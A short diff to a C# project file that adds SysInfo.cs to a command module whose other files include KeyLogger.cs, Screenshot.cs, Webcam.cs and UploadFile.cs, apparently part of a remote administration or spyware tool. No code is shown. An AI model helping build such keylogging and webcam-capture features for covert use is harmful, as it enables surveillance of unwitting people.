--- a/Commands/Commands.csproj
+++ b/Commands/Commands.csproj
@@ -59,6 +59,7 @@
     <Compile Include="KeyLogger.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
     <Compile Include="Screenshot.cs" />
+    <Compile Include="SysInfo.cs" />
     <Compile Include="Terminate.cs" />
     <Compile Include="UploadFile.cs" />
     <Compile Include="Webcam.cs" />
